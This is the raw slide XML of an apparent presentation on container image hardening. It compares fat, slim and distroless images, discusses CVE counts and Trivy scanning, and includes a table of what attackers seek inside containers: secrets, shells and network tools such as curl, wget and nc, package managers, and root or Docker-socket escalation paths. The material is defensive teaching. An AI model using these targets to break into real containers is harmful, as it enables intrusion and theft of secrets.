          <a:off x="348342" y="1416614"/>
          <a:ext cx="11495315" cy="4495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66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D5CC7F-716C-91E2-F159-9924CF4B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6"/>
            <a:ext cx="6947999" cy="549757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800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C9FB8-F6BE-8204-7D65-5859FB404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4975" y="2112111"/>
            <a:ext cx="4101825" cy="1170440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Understanding container images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86D6B6-96D2-1FBA-3812-DAF6583A274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57C352-ECFE-9C3D-A189-53017DF9D7C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07776" y="2115620"/>
            <a:ext cx="4101825" cy="426646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>distroless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D1127E-2096-05B8-0C25-4B95AA7A9B4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1810B6-2176-795F-D3B1-F9258D2F51A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704975" y="3197961"/>
            <a:ext cx="4101825" cy="426646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Threat modelling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7FF33B-9090-9318-A032-4008DA5D5CD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AF8675F-98AB-7FE6-CDFF-375A37556BC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007776" y="3201470"/>
            <a:ext cx="4101825" cy="734423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Hardening checklist &amp; CI/CD tips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89F538-D581-2643-2F84-476A02EFBD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F0008D3-9865-84A0-C0DF-1071BC8DE24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704975" y="4197471"/>
            <a:ext cx="4101825" cy="734423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Container Vulnerability Demo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9D58C9-A5F7-E777-6E89-970E0BA4F31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751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F3D7-47CF-E08F-F9F7-398350DC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98537-300D-C1DB-A672-1A2ADE50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949866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="5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323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6937E-7944-64CA-2085-72687A99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6D9829-6375-E96B-4ABA-B717D139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1780863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0"/>
              <a:t>Understanding container images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162427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9BD5E-2CE9-7764-C5F9-BE4A821A6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4268E5-4DA8-233B-951F-635A9FC9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What container images contains ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/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7841B6CD-4BE5-2E5B-CD43-9207E115E7DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8897983" y="3386571"/>
            <a:ext cx="3466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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>✅ Needed for app execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>🧩 Often slimmer in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>distroless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> builds 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976E5CA-6359-6A1B-3195-815D3DA0654B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8897983" y="2294675"/>
            <a:ext cx="3442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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>✅ Present in all images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DF72D-EF88-DBE8-2A94-610EB1DCB745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1806711"/>
            <a:ext cx="12052664" cy="4596432"/>
            <a:chOff x="69668" y="2098765"/>
            <a:chExt cx="12052664" cy="45964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D45911-8C12-B1F4-E16A-ECBC797E57EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1603466" y="2098765"/>
              <a:ext cx="7156269" cy="4394110"/>
              <a:chOff x="1282337" y="2098765"/>
              <a:chExt cx="7156269" cy="4394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3C6CB59-3F6C-882D-4B4D-FB1DB56687E2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1282337" y="5512526"/>
                <a:ext cx="7156269" cy="980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>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-IN" sz="2000" b="1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Build Tools &amp; Debug Utilities (Build-time)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Compilers, package managers, curl, etc.  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Used for installing and building app deps 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Exists only in build stage (if multi-stage)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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24C4B1D-0AC6-3000-7C1F-4C0D0DEA656A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1282337" y="4374605"/>
                <a:ext cx="7156269" cy="9803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solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:endParaRPr>
              </a:p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Base OS Layer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Debian, Alpine, Ubuntu, etc.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Provides core libs and system utilities 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Shell, package managers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Equip" panose="02000503030000020004" pitchFamily="2" charset="77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04718A-071E-B538-E4DA-8EE78B18892E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1282337" y="3236685"/>
                <a:ext cx="7156269" cy="9803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Language Runtime / Runtime Libraries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Python, Node.js, Java Runtime, etc.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Required interpreters, shared libs</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-IN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Necessary to execute app code  </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1300" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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13E5541-3EA6-14A9-C717-AF55B2DB580D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1282337" y="2098765"/>
                <a:ext cx="7156269" cy="9803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Application Code &amp; Dependencies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App source code, frameworks, libs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Installed dependencies via pip/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                  </a:rPr>
                  <a:t>npm</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1300" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                  </a:rPr>
                  <a:t>/etc.</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4DF8B19-D2F2-C3E2-023A-55BD4564D7B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8967651" y="5679534"/>
              <a:ext cx="29718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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>⚠️</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>Often left behind in “fat” images </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>✅ Excluded from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>distroless</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t> images </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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A74B4739-453E-E98B-8AEF-9A72F1073DED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8967652" y="4587639"/>
              <a:ext cx="315468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IN" sz="1400" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>🐳 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-IN" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>Present in “fat” and “slim” images</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-IN" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>🚫 Removed in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-IN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>distroless</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-IN" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t> images </a:t>
              </a:r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57856A10-C9AC-50B7-02E9-5C4405221398}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="459377" y="2403847"/>
              <a:ext cx="102326" cy="3735696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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:endParaRPr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6413FF89-1DF9-327E-D93A-3113715578DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="69668" y="3782138"/>
              <a:ext cx="400110" cy="89607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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>Fat Image</a:t>
              </a:r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F520F875-D829-1463-4F64-9B5CB6BCDDBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838201" y="2588939"/>
              <a:ext cx="113212" cy="2427198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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:endParaRPr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292950AB-11BD-9A14-2E04-780B1C0809C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="474617" y="3670569"/>
              <a:ext cx="400110" cy="100764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latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>Slim Image</a:t>
              </a:r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90A23583-224E-CADE-1FDF-E199BEF81AF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1332411" y="2711624"/>
              <a:ext cx="104503" cy="902840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Equip" panose="02000503030000020004" pitchFamily="2" charset="7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DC101186-EF6C-D25B-C5A9-C4ADCE7D6246}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="954622" y="2353395"/>
              <a:ext cx="400110" cy="145167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err="1">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>Distroless</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                </a:rPr>
                <a:t>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9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ECAB-18C9-294D-A4C1-F873CFB09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21BA03-FDDB-BC1D-A571-7EF42A8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Fat vs Slim/Alpine vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>Distroless</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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800E20-E1EF-B837-193B-340FCFA73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5995"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467194" y="1265373"/>
          <a:ext cx="11257612" cy="49561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14403">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3824610059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2504500018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763835858"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2814403">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1058573890"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="329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Image Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1800" b="1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Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1800" b="1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Advantages</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1800" b="1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Challenges</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1800" b="1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607725412"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1167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Fat Image</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="18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Full Linux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Includes compilers, shell &amp; Package manager (apt, yum)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>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Easy for developers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1300" i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Large size, many vulnerabilities, big attack surface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926122877"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1186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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Slim/Alpine Image</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="18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Smaller base (*-slim, alpine) distribution to save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Still includes shell &amp; package manager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>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Smaller size, fewer CVEs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1300" i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>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Still exploitable, limited debugging tools</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1300" i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745080955"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2262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 err="1">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Distroless</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="18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Minimal runtime images (no shell, no package manager, very few binaries)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Minimal libraries, only what’s needed to run the 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optional :</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" dirty="0" err="1">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>nonroot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t> variants – least privilege by default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Tiny attack surface, secure for production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>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Debugging harder (requires :debug variant or sidecar debugging)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19001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3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4591-8731-F5D0-E574-34C81D8E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55577-5B22-97AA-0D5E-FE41D4EA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55" y="2351696"/>
            <a:ext cx="11345763" cy="949866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0"/>
              <a:t>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321044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C87D-D71D-E666-BF4B-952A76B0E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963798-951B-00D5-13ED-A7B9C26C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What do attackers look inside containers?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14CB9-1670-38C0-464A-C628710DA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30128"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1825625"/>
          <a:ext cx="10515600" cy="438215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334485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131397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39715150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latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Category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latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>What They Target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>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Why It Matters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09438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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Credentials &amp; Secrets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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>API keys, cloud creds, DB passwords, tokens in env vars or mounted files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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Provide access to external systems, databases, or cloud accounts — enables privilege escalation and persistence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91583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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Sensitive Files &amp; Data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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Configs, logs, backups, database dumps, PII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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Contain valuable or sensitive information that can be exfiltrated for profit or further attacks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881200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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Shells &amp; Utilities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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>/bin/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sh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>, /bin/bash, curl, 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wget</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>, python, 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nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>, 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busybox</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1300" i="0" dirty="0">
                        <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                      </a:endParaRP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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Allow attackers to execute commands, fetch malware, or move laterally inside the environment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212592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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Package Managers &amp; Build Tools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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>apt, 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apk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>, yum, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" i="0" dirty="0" err="1">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>gcc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1300" i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>, make, pip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>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Let attackers install additional tools, compile exploits, or modify the runtime environment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40514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0" i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Privileges, SUID &amp; Host Interfaces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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Running as root, SUID binaries, Docker socket mounts, kernel capabilities (NET_RAW, SYS_ADMIN)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i="0" dirty="0">
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Enable escalation to host level or compromise of other containers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="65929" marR="65929" marT="32965" marB="329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55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5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2F24C-6FEB-9BBC-99B0-ABB0E8EC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F6FA56-BC49-988A-54B3-3BF3F24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Why Fat &amp; Slim images become targets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9B5662-BAC3-9D42-315D-DF362D2FF34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13920" y="1720840"/>
            <a:ext cx="109641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Built‑in tools invite abuse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Images that include shells, package managers, or networking tools give attackers easy ways to run commands or move laterally.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quip" panose="02000503030000020004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More packages = more holes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Every installed package can contain vulnerabilities an attacker can exploit.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quip" panose="02000503030000020004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Slim ≠ safe by default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Smaller images reduce risk, but many still include shells or utilities that enable attacks.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quip" panose="02000503030000020004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Easy persistence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quip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>If tools exist inside the image, attackers can download scripts, create users, or install backdoors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220474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9AA4-627C-263F-7469-C8F506B7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481125"/>
            <a:ext cx="10080000" cy="549757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>Attack Surface &amp; CVEs: Fat vs Slim vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>Distroless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D57DA-B1F9-AA93-47F4-615A836BB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44" y="1609275"/>
            <a:ext cx="5302339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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Fat images:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> most packages → largest CVE count.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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Slim images:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> fewer packages → reduced CVEs but still present.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 err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Distroless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> minimal runtime → drastically fewer CVEs.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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Takeaway:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> Smaller / minimal images reduce attack surface significantly.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113BB2-15F3-C3C9-3989-4D840CCF8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830059"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6465493" y="2923952"/>
          <a:ext cx="5150277" cy="2826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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E0BDCD-BF2F-53AF-8C7B-7D51F2057218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528444" y="6180101"/>
            <a:ext cx="1091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used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>trivy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tool for vulnerability scan on fat, slim and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distroless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> images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1D9685-CB17-3807-C6C8-D3F9D9F1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85879"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6465493" y="1183682"/>
          <a:ext cx="4402802" cy="1310640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2201401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
